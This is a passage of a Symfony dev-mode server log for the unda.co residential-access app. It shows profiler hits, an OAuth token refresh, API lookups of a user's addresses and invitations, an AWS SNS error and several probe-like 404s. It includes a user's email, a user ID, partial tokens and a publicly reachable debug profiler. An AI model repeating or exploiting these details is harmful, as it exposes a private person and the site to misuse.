  1049. [2025-12-16 17:24:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  1050. [2025-12-16 17:27:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d9f0f2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d9f0f2","method":"GET"} []
  1051. [2025-12-16 17:27:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  1052. [2025-12-16 17:34:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"af2b6f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/af2b6f","method":"GET"} []
  1053. [2025-12-16 17:34:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1054. [2025-12-16 17:34:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d9ab8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1d9ab8?panel=swiftmailer","method":"GET"} []
  1055. [2025-12-16 17:34:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  1056. [2025-12-16 17:41:53] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  1057. [2025-12-16 17:41:53] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  1058. [2025-12-16 17:41:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["b4d892c3ef2ead92fe6df7ec53 [...]"] []
  1059. [2025-12-16 17:41:53] doctrine.DEBUG: "START TRANSACTION" [] []
  1060. [2025-12-16 17:41:53] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"023018c29c69676569a91dd1d9 [...]","3":"2025-12-16 18:11:53","4":"","5":490,"6":"[]"} []
  1061. [2025-12-16 17:41:53] doctrine.DEBUG: "COMMIT" [] []
  1062. [2025-12-16 17:41:53] doctrine.DEBUG: "START TRANSACTION" [] []
  1063. [2025-12-16 17:41:53] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"20f8941d055a9c3d50806828e2 [...]","3":"2026-02-14 17:41:53","4":"","5":490,"6":"[]"} []
  1064. [2025-12-16 17:41:53] doctrine.DEBUG: "COMMIT" [] []
  1065. [2025-12-16 17:41:53] doctrine.DEBUG: "START TRANSACTION" [] []
  1066. [2025-12-16 17:41:53] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"b4d892c3ef2ead92fe6df7ec53 [...]"] []
  1067. [2025-12-16 17:41:53] doctrine.DEBUG: "COMMIT" [] []
  1068. [2025-12-16 17:41:54] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  1069. [2025-12-16 17:41:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1070. [2025-12-16 17:41:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1071. [2025-12-16 17:41:54] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1072. [2025-12-16 17:41:54] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1073. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["023018c29c69676569a91dd1d9 [...]"] []
  1074. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
  1075. [2025-12-16 17:41:54] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"e.r_roca@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1076. [2025-12-16 17:41:54] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1077. [2025-12-16 17:41:54] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1078. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["21634f24-58b5-45c7-becd-1d [...]"] []
  1079. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [490,1] []
  1080. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [490,1] []
  1081. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  1082. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["521cb7fb-4b51-4095-9d92-51 [...]"] []
  1083. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [490,255] []
  1084. [2025-12-16 17:41:54] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1085. [2025-12-16 17:41:54] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"521cb7fb-4b51-4095-9d92-51d2933080dd","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/521cb7fb-4b51-4095-9d92-51d2933080dd/invitation/10/0?order=desc","method":"GET"} []
  1086. [2025-12-16 17:41:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1087. [2025-12-16 17:41:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1088. [2025-12-16 17:41:54] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1089. [2025-12-16 17:41:54] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1090. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["023018c29c69676569a91dd1d9 [...]"] []
  1091. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
  1092. [2025-12-16 17:41:54] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"e.r_roca@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1093. [2025-12-16 17:41:54] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1094. [2025-12-16 17:41:54] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1095. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["521cb7fb-4b51-4095-9d92-51 [...]"] []
  1096. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [490,255,1] []
  1097. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["521cb7fb-4b51-4095-9d92-51 [...]"] []
  1098. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  1099. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [255,1] []
  1100. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [255,1] []
  1101. [2025-12-16 17:41:54] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  1102. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
  1103. [2025-12-16 17:41:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1104. [2025-12-16 17:41:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1105. [2025-12-16 17:41:54] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1106. [2025-12-16 17:41:54] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1107. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [379] []
  1108. [2025-12-16 17:41:54] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1109. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["023018c29c69676569a91dd1d9 [...]"] []
  1110. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
  1111. [2025-12-16 17:41:54] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"e.r_roca@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1112. [2025-12-16 17:41:54] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1113. [2025-12-16 17:41:54] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1114. [2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["0F00AE6E-15BB-4D70-B7F3-58 [...]",1,490] []
  1115. [2025-12-16 17:41:54] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>f66edc90-461b-5b34-ba4d-bd2bda39a66d</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>f66edc90-461b-5b34-ba4d-bd2bda39a66d</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  1116. [2025-12-16 17:41:54] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1117. [2025-12-16 17:45:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c412a9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c412a9?panel=exception","method":"GET"} []
  1118. [2025-12-16 17:45:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  1119. [2025-12-16 17:49:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=cache","method":"GET"} []
  1120. [2025-12-16 17:49:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1121. [2025-12-16 17:57:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5942b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c5942b?panel=twig","method":"GET"} []
  1122. [2025-12-16 17:57:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1123. [2025-12-16 18:05:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=db","method":"GET"} []
  1124. [2025-12-16 18:05:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  1125. [2025-12-16 18:14:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7","method":"GET"} []
  1126. [2025-12-16 18:14:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1127. [2025-12-16 18:19:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1128. [2025-12-16 18:29:49] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  1129. [2025-12-16 18:29:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1130. [2025-12-16 18:29:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1131. [2025-12-16 18:29:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1132. [2025-12-16 18:29:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1133. [2025-12-16 18:29:50] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  1134. [2025-12-16 18:30:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6e651","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f6e651?panel=db","method":"GET"} []
  1135. [2025-12-16 18:30:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  1136. [2025-12-16 18:38:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a3dfd1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a3dfd1?panel=twig","method":"GET"} []
  1137. [2025-12-16 18:38:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
